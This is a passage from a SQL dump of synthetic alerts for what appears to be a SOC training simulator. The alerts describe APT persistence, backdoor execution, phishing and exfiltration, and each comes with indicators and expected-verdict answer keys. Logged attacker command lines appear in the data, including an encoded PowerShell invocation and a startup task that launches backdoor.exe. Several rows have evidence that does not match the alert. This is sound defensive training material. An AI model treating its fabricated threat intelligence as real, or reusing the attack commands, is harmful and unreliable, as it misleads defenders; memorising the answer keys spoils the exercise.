host.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"external threat intelligence\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP associated with PlugX distribution.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"plugx_loader.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"malware database\",\"verdict\":\"malicious\",\"details\":\"PlugX malware executable used to establish control.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"3f8a72d8b6b9c3b9f0a2a1b7b8c1c9d8\",\"is_critical\":true,\"osint_result\":{\"source\":\"hash registry\",\"verdict\":\"malicious\",\"details\":\"Hash associated with PlugX malware variant.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal user 
database\",\"verdict\":\"clean\",\"details\":\"Legitimate user account potentially compromised.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'advanced', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(1189, 'Maintaining Persistence with Backdoor - System Compromise', 'high', 'System Logs', 'Advanced persistent threat (APT) actors have installed a backdoor to maintain long-term access to the compromised system. The backdoor is designed to automatically reconnect to the command and control (C2) server upon system reboot.', 'Persistence', 'T1053.005 - Scheduled Task/Job: Scheduled Task', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-15T14:23:58Z\",\"event_type\":\"Scheduled Task Created\",\"task_name\":\"SystemUpdate\",\"task_action\":\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"parameters\":\"/c start C:\\\\Users\\\\Public\\\\backdoor.exe\",\"trigger\":\"At system startup\",\"user\":\"COMPANY\\\\admin_user\",\"source_ip\":\"192.168.1.10\",\"destination_ip\":\"203.0.113.45\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"file_path\":\"C:\\\\Users\\\\Public\\\\backdoor.exe\"}', '2026-02-07 21:23:06', '2026-02-22 14:58:21', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP associated with known C2 servers.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Hash associated with backdoor malware.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"C:\\\\Users\\\\Public\\\\backdoor.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"File System\",\"verdict\":\"malicious\",\"details\":\"Known backdoor 
executable.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"COMPANY\\\\admin_user\",\"is_critical\":false,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"suspicious\",\"details\":\"User account used during unauthorized task creation.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'advanced', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-08T19:00:02.502Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:58Z\\\",\\\"event_type\\\":\\\"Scheduled Task Created\\\",\\\"task_name\\\":\\\"SystemUpdate\\\",\\\"task_action\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\svchost.exe\\\",\\\"parameters\\\":\\\"/c start C:\\\\\\\\Users\\\\\\\\Public\\\\\\\\backdoor.exe\\\",\\\"trigger\\\":\\\"At system startup\\\",\\\"user\\\":\\\"COMPANY\\\\\\\\admin_user\\\",\\\"source_ip\\\":\\\"192.168.1.10\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"file_path\\\":\\\"C:\\\\\\\\Users\\\\\\\\Public\\\\\\\\backdoor.exe\\\"}\"},{\"timestamp\":\"2026-02-08T18:59:02.502Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:58Z\\\",\\\"event_type\\\":\\\"Scheduled Task Created\\\",\\\"task_name\\\":\\\"SystemUpdate\\\",\\\"task_action\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\svchost.exe\\\",\\\"parameters\\\":\\\"/c start C:\\\\\\\\Users\\\\\\\\Public\\\\\\\\backdoor.exe\\\",\\\"trigger\\\":\\\"At system 
startup\\\",\\\"user\\\":\\\"COMPANY\\\\\\\\admin_user\\\",\\\"source_ip\\\":\\\"192.168.1.10\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"file_path\\\":\\\"C:\\\\\\\\Users\\\\\\\\Public\\\\\\\\backdoor.exe\\\"}\"},{\"timestamp\":\"2026-02-08T18:58:02.502Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:58Z\\\",\\\"event_type\\\":\\\"Scheduled Task Created\\\",\\\"task_name\\\":\\\"SystemUpdate\\\",\\\"task_action\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\svchost.exe\\\",\\\"parameters\\\":\\\"/c start C:\\\\\\\\Users\\\\\\\\Public\\\\\\\\backdoor.exe\\\",\\\"trigger\\\":\\\"At system startup\\\",\\\"user\\\":\\\"COMPANY\\\\\\\\admin_user\\\",\\\"source_ip\\\":\\\"192.168.1.10\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"file_path\\\":\\\"C:\\\\\\\\Users\\\\\\\\Public\\\\\\\\backdoor.exe\\\"}\"},{\"timestamp\":\"2026-02-08T18:57:02.502Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:58Z\\\",\\\"event_type\\\":\\\"Scheduled Task Created\\\",\\\"task_name\\\":\\\"SystemUpdate\\\",\\\"task_action\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\svchost.exe\\\",\\\"parameters\\\":\\\"/c start C:\\\\\\\\Users\\\\\\\\Public\\\\\\\\backdoor.exe\\\",\\\"trigger\\\":\\\"At system 
startup\\\",\\\"user\\\":\\\"COMPANY\\\\\\\\admin_user\\\",\\\"source_ip\\\":\\\"192.168.1.10\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"file_path\\\":\\\"C:\\\\\\\\Users\\\\\\\\Public\\\\\\\\backdoor.exe\\\"}\"},{\"timestamp\":\"2026-02-08T18:56:02.502Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:58Z\\\",\\\"event_type\\\":\\\"Scheduled Task Created\\\",\\\"task_name\\\":\\\"SystemUpdate\\\",\\\"task_action\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\svchost.exe\\\",\\\"parameters\\\":\\\"/c start C:\\\\\\\\Users\\\\\\\\Public\\\\\\\\backdoor.exe\\\",\\\"trigger\\\":\\\"At system startup\\\",\\\"user\\\":\\\"COMPANY\\\\\\\\admin_user\\\",\\\"source_ip\\\":\\\"192.168.1.10\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"file_path\\\":\\\"C:\\\\\\\\Users\\\\\\\\Public\\\\\\\\backdoor.exe\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1190, 'Lateral Movement Across Networks', 'high', 'Active Directory Logs', 'Using stolen credentials, the Calypso APT has moved laterally across network segments, gaining access to sensitive departments and expanding their data access scope.', 'Lateral Movement', 'T1078', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-18T14:05:23Z\",\"event_id\":\"4624\",\"computer_name\":\"server-finance.internal.local\",\"user_name\":\"jdoe\",\"logon_type\":\"3\",\"logon_process\":\"NtLmSsp\",\"authentication_package\":\"NTLM\",\"ip_address\":\"192.168.1.102\",\"source_ip\":\"203.0.113.45\",\"domain\":\"internal\",\"workstation_name\":\"workstation-23.internal.local\",\"hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"file_name\":\"calc.exe\",\"additional_info\":{\"impersonation_level\":\"Impersonation\",\"restricted_admin_mode\":\"No\"}}', '2026-02-07 21:23:06', '2026-02-22 14:55:47', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.102\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal network IP address\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"OSINT Database\",\"verdict\":\"malicious\",\"details\":\"IP associated with known APT activities\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"File hash associated with Calypso APT\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal User Database\",\"verdict\":\"suspicious\",\"details\":\"User credentials potentially compromised\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True 
Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'advanced', 'TI', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Identity\",\"evidence\":{\"user\":{\"username\":\"jdoe\",\"display_name\":\"John Doe\",\"department\":\"Finance\",\"manager\":\"Jane Smith\"},\"risk_score\":85,\"recent_activity\":[{\"action\":\"Login Success\",\"ip\":\"10.0.0.5\",\"location\":\"New York, US\",\"time\":\"09:00 AM\"},{\"action\":\"Password Reset Request\",\"ip\":\"192.168.1.5\",\"location\":\"New York, US\",\"time\":\"09:05 AM\"},{\"action\":\"Login Failed\",\"ip\":\"203.0.113.99\",\"location\":\"Moscow, RU\",\"time\":\"02:00 AM\",\"flag\":true}]}}', 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(1191, 'Data Exfiltration via Encrypted Channels', 'critical', 'Network Traffic Analysis', 'In the final stage, the attackers successfully exfiltrated sensitive data using encrypted channels to evade detection, completing their espionage mission. The data was sent to an external IP associated with known malicious activities.', 'Data Exfiltration', 'T1048', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-18T14:23:45Z\",\"source_ip\":\"192.168.10.15\",\"destination_ip\":\"198.51.100.23\",\"protocol\":\"HTTPS\",\"bytes_sent\":5242880,\"encryption\":\"SSL/TLS\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\",\"file_hash\":\"3f786850e387550fdab836ed7e6dc881de23001b\",\"filename\":\"financial_report_2023.pdf\",\"username\":\"jdoe\",\"indicator_type\":\"network\",\"event_type\":\"data_exfiltration\",\"tags\":[\"encrypted\",\"sensitive\",\"exfiltration\"]}', '2026-02-07 21:23:06', '2026-02-16 04:57:10', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.10.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"198.51.100.23\",\"is_critical\":true,\"osint_result\":{\"source\":\"malicious_ip_database\",\"verdict\":\"malicious\",\"details\":\"IP address associated with known threat actors\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"3f786850e387550fdab836ed7e6dc881de23001b\",\"is_critical\":true,\"osint_result\":{\"source\":\"virus_total\",\"verdict\":\"suspicious\",\"details\":\"File hash linked to previous suspicious activity\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"financial_report_2023.pdf\",\"is_critical\":true,\"osint_result\":{\"source\":\"file_analysis\",\"verdict\":\"suspicious\",\"details\":\"Sensitive document typically targeted by data theft 
operations\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'advanced', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(1192, 'Suspicious Email with Malicious Payload', 'high', 'Email security gateway logs', 'An email purportedly from a trusted aerospace partner was sent to a key engineer with a malicious payload designed to deploy the HyperBro backdoor. The email originated from an IP linked to known APT27 activity.', 'Phishing', 'T1566.001 - Spearphishing Attachment', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-14T08:23:45Z\",\"email\":{\"from\":\"trusted.partner@example.com\",\"to\":\"john.doe@aerospacecorp.com\",\"subject\":\"New Project Proposal\",\"attachment\":{\"filename\":\"Project_Proposal.pdf.exe\",\"hash\":\"d41d8cd98f00b204e9800998ecf8427e\"}},\"network\":{\"src_ip\":\"203.0.113.15\",\"dst_ip\":\"192.168.1.45\"},\"user\":\"john.doe@aerospacecorp.com\"}', '2026-02-07 21:23:28', '2026-02-21 08:11:21', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"email\",\"value\":\"trusted.partner@example.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"ThreatIntelDB\",\"verdict\":\"suspicious\",\"details\":\"Email address used in previous spear-phishing campaigns linked to APT27\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash matches known HyperBro backdoor sample\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"203.0.113.15\",\"is_critical\":true,\"osint_result\":{\"source\":\"MaliciousIPDB\",\"verdict\":\"malicious\",\"details\":\"IP address associated with APT27 command and control servers\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"Project_Proposal.pdf.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"InternalSecurityDB\",\"verdict\":\"malicious\",\"details\":\"Executable masquerading as PDF, common tactic in phishing 
attacks\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"john.doe@aerospacecorp.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Targeted employee in the aerospace department\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'expert', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Suspicious Email with Malicious Payload\",\"date\":\"2026-02-08T19:00:02.507Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(1193, 'Execution of HyperBro Backdoor', 'high', 'Endpoint detection and response (EDR) logs', 'Upon clicking the email attachment, the HyperBro backdoor is executed, establishing a persistent foothold on the victim\'s machine to facilitate further operations.', 'Malware Execution', 'T1059 - Command and Scripting Interpreter', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-15T14:28:34Z\",\"event_id\":\"EDR1234567\",\"user\":\"jdoe\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.101\",\"malware_name\":\"HyperBro\",\"file_path\":\"C:\\\\Users\\\\jdoe\\\\Documents\\\\invoice.docx\",\"hash\":\"5d41402abc4b2a76b9719d911017c592\",\"process_id\":6789,\"process_name\":\"Winword.exe\",\"command_line\":\"C:\\\\Program Files\\\\Microsoft Office\\\\root\\\\Office16\\\\WINWORD.EXE /n \\\"C:\\\\Users\\\\jdoe\\\\Documents\\\\invoice.docx\\\"\",\"network_connections\":[{\"ip\":\"203.0.113.45\",\"port\":443,\"protocol\":\"HTTPS\"}]}', '2026-02-07 21:23:28', '2026-02-21 08:12:25', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"OSINT Database\",\"verdict\":\"malicious\",\"details\":\"IP associated with known APT activity.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"5d41402abc4b2a76b9719d911017c592\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash identified as HyperBro backdoor.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"C:\\\\Users\\\\jdoe\\\\Documents\\\\invoice.docx\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"suspicious\",\"details\":\"Document used as a lure to deploy malware.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Directory\",\"verdict\":\"internal\",\"details\":\"Legitimate user 
account.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'expert', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(1194, 'Establishing Persistence via Registry Modification', 'high', 'Windows registry audit logs', 'APT27 has modified the registry entry to ensure the HyperBro backdoor reloads after system reboots, maintaining persistent access to the compromised system.', 'Persistence', 'T1547.001 - Registry Run Keys / Startup Folder', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-18T14:45:00Z\",\"event_id\":4657,\"event_type\":\"Registry Value Change\",\"user\":\"admin_user\",\"user_sid\":\"S-1-5-21-3623811015-3361044348-30300820-1013\",\"computer_name\":\"CompromisedHost01\",\"registry_key\":\"HKEY_LOCAL_MACHINE\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\",\"registry_value_name\":\"HyperBro\",\"registry_value\":\"\\\"C:\\\\Windows\\\\System32\\\\hyperbro.exe\\\"\",\"process_id\":5123,\"process_name\":\"regedit.exe\",\"network_information\":{\"source_ip\":\"10.0.0.45\",\"destination_ip\":\"203.0.113.42\",\"destination_port\":80},\"file_hash\":\"b5a5b4c7f4e2c5d8a2b0e4c5a6b7c8d9\"}', '2026-02-07 21:23:28', '2026-02-21 16:02:18', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.42\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Database\",\"verdict\":\"malicious\",\"details\":\"Known C2 server associated with APT27.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"b5a5b4c7f4e2c5d8a2b0e4c5a6b7c8d9\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Analysis Report\",\"verdict\":\"malicious\",\"details\":\"Identified as HyperBro backdoor.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"hyperbro.exe\",\"is_critical\":false,\"osint_result\":{\"source\":\"File Reputation Service\",\"verdict\":\"malicious\",\"details\":\"Part of the APT27 toolkit.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"admin_user\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal User Audit\",\"verdict\":\"internal\",\"details\":\"Privileged account used in 
multiple suspicious activities.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'expert', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-08T19:00:02.510Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-18T14:45:00Z\\\",\\\"event_id\\\":4657,\\\"event_type\\\":\\\"Registry Value Change\\\",\\\"user\\\":\\\"admin_user\\\",\\\"user_sid\\\":\\\"S-1-5-21-3623811015-3361044348-30300820-1013\\\",\\\"computer_name\\\":\\\"CompromisedHost01\\\",\\\"registry_key\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\",\\\"registry_value_name\\\":\\\"HyperBro\\\",\\\"registry_value\\\":\\\"\\\\\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\hyperbro.exe\\\\\\\"\\\",\\\"process_id\\\":5123,\\\"process_name\\\":\\\"regedit.exe\\\",\\\"network_information\\\":{\\\"source_ip\\\":\\\"10.0.0.45\\\",\\\"destination_ip\\\":\\\"203.0.113.42\\\",\\\"destination_port\\\":80},\\\"file_hash\\\":\\\"b5a5b4c7f4e2c5d8a2b0e4c5a6b7c8d9\\\"}\"},{\"timestamp\":\"2026-02-08T18:59:02.510Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-18T14:45:00Z\\\",\\\"event_id\\\":4657,\\\"event_type\\\":\\\"Registry Value 
Change\\\",\\\"user\\\":\\\"admin_user\\\",\\\"user_sid\\\":\\\"S-1-5-21-3623811015-3361044348-30300820-1013\\\",\\\"computer_name\\\":\\\"CompromisedHost01\\\",\\\"registry_key\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\",\\\"registry_value_name\\\":\\\"HyperBro\\\",\\\"registry_value\\\":\\\"\\\\\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\hyperbro.exe\\\\\\\"\\\",\\\"process_id\\\":5123,\\\"process_name\\\":\\\"regedit.exe\\\",\\\"network_information\\\":{\\\"source_ip\\\":\\\"10.0.0.45\\\",\\\"destination_ip\\\":\\\"203.0.113.42\\\",\\\"destination_port\\\":80},\\\"file_hash\\\":\\\"b5a5b4c7f4e2c5d8a2b0e4c5a6b7c8d9\\\"}\"},{\"timestamp\":\"2026-02-08T18:58:02.510Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-18T14:45:00Z\\\",\\\"event_id\\\":4657,\\\"event_type\\\":\\\"Registry Value Change\\\",\\\"user\\\":\\\"admin_user\\\",\\\"user_sid\\\":\\\"S-1-5-21-3623811015-3361044348-30300820-1013\\\",\\\"computer_name\\\":\\\"CompromisedHost01\\\",\\\"registry_key\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\",\\\"registry_value_name\\\":\\\"HyperBro\\\",\\\"registry_value\\\":\\\"\\\\\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\hyperbro.exe\\\\\\\"\\\",\\\"process_id\\\":5123,\\\"process_name\\\":\\\"regedit.exe\\\",\\\"network_information\\\":{\\\"source_ip\\\":\\\"10.0.0.45\\\",\\\"destination_ip\\\":\\\"203.0.113.42\\\",\\\"destination_port\\\":80},\\\"file_hash\\\":\\\"b5a5b4c7f4e2c5d8a2b0e4c5a6b7c8d9\\\"}\"},{\"timestamp\":\"2026-02-08T18:57:02.510Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
